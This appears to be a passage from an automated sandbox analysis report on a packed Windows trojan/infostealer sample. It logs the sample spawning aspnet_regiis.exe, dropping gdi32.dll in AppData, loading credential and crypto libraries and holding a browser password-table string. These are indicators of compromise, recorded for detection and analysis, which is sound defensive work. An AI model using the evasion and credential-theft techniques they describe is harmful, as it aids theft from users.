                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027C9A002_2_027C9A00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027AD2F02_2_027AD2F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027982B02_2_027982B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027CF2B02_2_027CF2B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027C22902_2_027C2290
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027CC2802_2_027CC280
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027B53702_2_027B5370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027C6B5C2_2_027C6B5C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027CF3502_2_027CF350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027C9B492_2_027C9B49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02798B302_2_02798B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027BD3302_2_027BD330
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0279FB162_2_0279FB16
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027CF3E02_2_027CF3E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027A93D22_2_027A93D2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027C5BAA2_2_027C5BAA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02794BA02_2_02794BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027CF0402_2_027CF040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027AB8392_2_027AB839
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027AD0202_2_027AD020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027998142_2_02799814
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027C08002_2_027C0800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027BD0FF2_2_027BD0FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027958C02_2_027958C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027938B02_2_027938B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027C20A02_2_027C20A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027B796F2_2_027B796F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027B19602_2_027B1960
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027B81502_2_027B8150
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027CF1302_2_027CF130
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027A71F02_2_027A71F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027BA9F02_2_027BA9F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027BE1C62_2_027BE1C6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027961B02_2_027961B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027C71AD2_2_027C71AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027C81A02_2_027C81A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027A99802_2_027A9980
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027B3E612_2_027B3E61
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027BB65A2_2_027BB65A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027966402_2_02796640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02795E102_2_02795E10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02792EB02_2_02792EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0279AE902_2_0279AE90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027A47602_2_027A4760
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027B67602_2_027B6760
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027A7F482_2_027A7F48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027BB7482_2_027BB748
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027B67402_2_027B6740
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027C7F402_2_027C7F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027B873A2_2_027B873A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027B97202_2_027B9720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027997102_2_02799710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027A6F132_2_027A6F13
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027AD7002_2_027AD700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027BA7F02_2_027BA7F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027CCFF72_2_027CCFF7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027CFFE02_2_027CFFE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027B8FD02_2_027B8FD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027BB7C32_2_027BB7C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027A7FB12_2_027A7FB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027CBFB02_2_027CBFB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027C94602_2_027C9460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027B04402_2_027B0440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027AB4322_2_027AB432
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027974202_2_02797420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027ADC102_2_027ADC10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027BE4F12_2_027BE4F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027CFCE02_2_027CFCE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027BDCAF2_2_027BDCAF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027C648E2_2_027C648E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027AFC892_2_027AFC89
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027BFDD02_2_027BFDD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027A15982_2_027A1598
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027B1D902_2_027B1D90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 02797FB0 appears 44 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 027A4750 appears 78 times
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7616 -s 1224
                Source: 9cOUjp7ybm.exe, 00000000.00000000.1695875226.000000000048C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameQuinnSamuelYvonne.lnknxLs4 vs 9cOUjp7ybm.exe
                Source: 9cOUjp7ybm.exe, 00000000.00000002.1740413999.0000000000C0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 9cOUjp7ybm.exe
                Source: 9cOUjp7ybm.exeBinary or memory string: OriginalFilenameQuinnSamuelYvonne.lnknxLs4 vs 9cOUjp7ybm.exe
                Source: 9cOUjp7ybm.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 9cOUjp7ybm.exeStatic PE information: Section: <qqo!9W ZLIB complexity 1.0003197898327465
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/7@1/1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027C8890 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,2_2_027C8890
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7616
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\7477035f-5bf5-453e-8eed-8ecdf9296fc2Jump to behavior
                Source: 9cOUjp7ybm.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: aspnet_regiis.exe, 00000002.00000003.1730183416.0000000004F08000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1730590484.0000000004ED5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 9cOUjp7ybm.exeReversingLabs: Detection: 65%
                Source: 9cOUjp7ybm.exeVirustotal: Detection: 66%
                Source: 9cOUjp7ybm.exeString found in binary or memory: -addpset
                Source: 9cOUjp7ybm.exeString found in binary or memory: -addfulltrust
                Source: 9cOUjp7ybm.exeString found in binary or memory: -addgroup
                Source: 9cOUjp7ybm.exeString found in binary or memory: -help
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeFile read: C:\Users\user\Desktop\9cOUjp7ybm.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\9cOUjp7ybm.exe "C:\Users\user\Desktop\9cOUjp7ybm.exe"
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7616 -s 1224
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: 9cOUjp7ybm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: 9cOUjp7ybm.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: \mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 9cOUjp7ybm.exe, 00000000.00000002.1740413999.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 9cOUjp7ybm.exe, 00000000.00000002.1740413999.0000000000CAA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: 9cOUjp7ybm.exe, 00000000.00000002.1740413999.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, WEREB44.tmp.dmp.4.dr
                Source: Binary string: C:\Users\user\Desktop\9cOUjp7ybm.PDBD{ source: 9cOUjp7ybm.exe, 00000000.00000002.1740123015.00000000008FA000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: mscorlib.ni.pdb source: WEREB44.tmp.dmp.4.dr
                Source: Binary string: n0C:\Windows\mscorlib.pdb source: 9cOUjp7ybm.exe, 00000000.00000002.1740123015.00000000008FA000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdbs source: 9cOUjp7ybm.exe, 00000000.00000002.1740413999.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 9cOUjp7ybm.exe, 00000000.00000002.1740413999.0000000000C6A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.ni.pdbRSDS source: WEREB44.tmp.dmp.4.dr
                Source: Binary string: \??\C:\Users\user\Desktop\9cOUjp7ybm.PDBr source: 9cOUjp7ybm.exe, 00000000.00000002.1740413999.0000000000C6A000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeUnpacked PE file: 0.2.9cOUjp7ybm.exe.3d0000.0.unpack <qqo!9W:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
                Source: 9cOUjp7ybm.exeStatic PE information: section name: <qqo!9W
                Source: 9cOUjp7ybm.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_003D2A40 push esp; iretd 0_2_003D2A42
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_0042FAB0 push eax; mov dword ptr [esp], 69686F3Eh0_2_0042FAB4
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_003DBC5E push eax; ret 0_2_003DBC6B
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_003DD4A7 push eax; ret 0_2_003DD4AD
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_003D54F4 push es; ret 0_2_003D550A
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_003D6D12 pushad ; retf 0_2_003D6D60
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_003D6D42 pushad ; retf 0_2_003D6D60
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_003D4DB4 push eax; retf 0_2_003D4DF1
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_003D659F push edx; retf 0_2_003D65C2
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_003D9763 push cs; retf 0_2_003D97F2
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_003D979A push cs; retf 0_2_003D97F2
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeCode function: 0_2_003D97F4 push cs; retf 0_2_003D9802
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027CBF20 push eax; mov dword ptr [esp], EAEBF4F5h2_2_027CBF2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027CEFB0 push eax; mov dword ptr [esp], 69686F3Eh2_2_027CEFB4
                Source: 9cOUjp7ybm.exeStatic PE information: section name: <qqo!9W entropy: 7.999708454943257
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to dropped file
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9cOUjp7ybm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
